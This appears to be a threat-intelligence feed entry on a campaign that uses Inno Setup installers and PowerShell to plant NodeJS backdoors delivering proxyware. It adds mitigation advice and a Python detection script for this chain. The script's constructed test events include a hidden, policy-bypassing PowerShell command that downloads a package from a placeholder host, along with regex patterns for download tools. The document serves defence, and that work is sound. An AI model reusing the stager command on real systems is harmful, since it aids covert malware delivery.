
NodeJS backdoors delivering proxyware and monetization schemes

Medium
Published: Wed Sep 24 2025 (09/24/2025, 10:32:36 UTC)
Source: AlienVault OTX General

Description

This report details a campaign involving NodeJS backdoors used to distribute proxyware and monetization schemes. The attackers employ Inno setup installers to drop PowerShell scripts that download and execute NodeJS packages with malicious JavaScript. The backdoors collect system information, communicate with command and control servers, and can execute various commands including PowerShell scripts and additional Node.js code. The campaign is associated with multiple proxyware applications like Infatica, Honeygain, earnFM, and PacketLab. The attackers also use browser extensions to track user navigation and potentially redirect to malicious URLs. The infrastructure involves numerous domains and cloud services for hosting malware and command and control.

AI-Powered Analysis

Last updated: 09/24/2025, 12:13:33 UTC

Technical Analysis

This threat involves a campaign leveraging NodeJS backdoors to distribute proxyware and monetization schemes. Attackers use Inno Setup installers to deploy PowerShell scripts that download and execute malicious NodeJS packages containing JavaScript code. These backdoors collect detailed system information and maintain communication with command and control (C2) servers, enabling remote execution of commands, including PowerShell scripts and additional NodeJS code. The campaign is linked to several proxyware applications such as Infatica, Honeygain, earnFM, and PacketLab, which monetize infected systems by routing third-party traffic through them or offering them as proxy exit points without user consent. Additionally, the attackers deploy browser extensions that monitor user navigation and can redirect users to malicious URLs, increasing the risk of further compromise or fraud. The infrastructure supporting this campaign is extensive, using numerous domains and cloud services to host malware and maintain resilient C2 channels. The techniques map to persistence via registry run keys or startup folder (T1547.001), execution via PowerShell, the Windows command shell and JavaScript (T1059.001, T1059.003, T1059.007), masquerading under legitimate file names or locations (T1036.005), ingress tool transfer (T1105) and C2 over web protocols (T1071.001). While no specific affected software versions are listed, the use of NodeJS and PowerShell indicates that systems running Windows environments with NodeJS installed are primarily targeted. The campaign does not currently have known exploits in the wild but represents a sophisticated threat combining backdoor access, proxyware monetization, and browser manipulation.

Potential Impact

For European organizations, this threat poses several risks. The unauthorized installation of proxyware can degrade network performance and increase bandwidth costs, while also potentially implicating organizations in illicit activities due to traffic routing through their systems. The backdoor capabilities allow attackers to execute arbitrary commands, potentially leading to data theft, lateral movement, or deployment of additional malware. The browser extensions can compromise user privacy and facilitate phishing or drive-by download attacks. Given the use of legitimate tools like PowerShell and NodeJS, detection may be challenging, increasing dwell time and risk of damage. Organizations in Europe with extensive Windows infrastructure and use of NodeJS in development or production environments are particularly vulnerable. The monetization schemes may also lead to reputational damage if employees or systems are found to be participating in unauthorized proxy networks. Furthermore, the campaign’s use of cloud services and multiple domains complicates takedown efforts and incident response.

Mitigation Recommendations

European organizations should implement multi-layered defenses tailored to this threat. Specifically, restrict the use of PowerShell and NodeJS execution to authorized scripts and applications by enforcing application whitelisting and script block logging. Monitor network traffic for unusual proxy connections or unexpected outbound communications to suspicious domains, leveraging threat intelligence feeds to identify known infrastructure related to this campaign. Conduct regular audits of installed browser extensions and enforce policies to prevent unauthorized extension installations. Employ endpoint detection and response (EDR) solutions capable of detecting anomalous PowerShell and NodeJS behaviors, including script downloads and execution patterns consistent with this campaign. Network segmentation can limit the spread of backdoors and proxyware within the organization. User awareness training should emphasize the risks of installing unauthorized software and browser extensions. Finally, collaborate with cloud service providers to monitor and restrict malicious hosting activities and consider deploying DNS filtering to block access to known malicious domains.
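As an added illustration of the EDR-style detection the recommendations call for (this is example code, not code from the report or from AlienVault), the following Python checks constructed Sysmon-style process-creation events for the installer -> PowerShell download -> node.exe chain described in the analysis. The event shape, paths, PIDs, command lines and the installer-name pattern are assumptions made for the example.

```python
"""Added example: flag node.exe processes spawned by PowerShell that show
traits of the installer -> PowerShell -> NodeJS chain in the report.
All sample events, paths and PIDs below are constructed, not report data."""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events shaped like Sysmon Event ID 1 (ProcessCreate).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\u\Downloads\setup.exe", "cmd": "setup.exe"},
    {"pid": 300, "ppid": 200, "image": PS,
     "cmd": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/pkg.zip -OutFile $env:TEMP\\pkg.zip"'},
    {"pid": 310, "ppid": 300, "image": r"C:\Users\u\AppData\Local\Temp\node\node.exe", "cmd": "node.exe index.js"},
    # Benign developer activity: node from an interactive shell, no download in the parent.
    {"pid": 500, "ppid": 100, "image": PS, "cmd": "powershell Get-Process"},
    {"pid": 510, "ppid": 500, "image": r"C:\Program Files\nodejs\node.exe", "cmd": "node --version"},
]

# Download cmdlets/aliases commonly seen in stager command lines.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# Assumed naming pattern for Inno Setup style installers (setup.exe, setup.tmp, *install*.exe).
SETUP_RE = re.compile(r"(setup|install)[^\\]*\.(exe|tmp)$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Temp|AppData|Downloads|ProgramData)\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_suspicious_node(events, max_depth=3):
    """Return (pid, reasons) for every node.exe whose parent is PowerShell and
    which shows at least one campaign trait: downloading parent, user-writable
    runtime path, or an installer within max_depth ancestors."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "node.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        reasons = []
        if DOWNLOAD_RE.search(parent["cmd"]):
            reasons.append("parent PowerShell downloads content")
        if USER_WRITABLE_RE.search(e["image"]):
            reasons.append("node.exe runs from a user-writable path")
        anc = by_pid.get(parent["ppid"])  # walk up looking for an installer
        for _ in range(max_depth):
            if anc is None:
                break
            if SETUP_RE.search(anc["image"]):
                reasons.append(f"installer ancestor {basename(anc['image'])}")
                break
            anc = by_pid.get(anc["ppid"])
        if reasons:
            findings.append((e["pid"], reasons))
    return findings
```

On the constructed events only PID 310 is flagged, with all three reasons; the developer's node.exe under PID 510 is not.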


Technical Details

Author: AlienVault
TLP: white
References: https://medium.com/walmartglobaltech/nodejs-backdoors-delivering-proxyware-and-monetization-schemes-1562917ed107
Adversary: null
Pulse Id: 68d3c8c4a7e20db27a3b4562
Threat Score: null

Indicators of Compromise


Threat ID: 68d3df81a166c667ef433e20

Added to database: 9/24/2025, 12:09:37 PM

Last enriched: 9/24/2025, 12:13:33 PM

Last updated: 9/25/2025, 6:56:44 AM
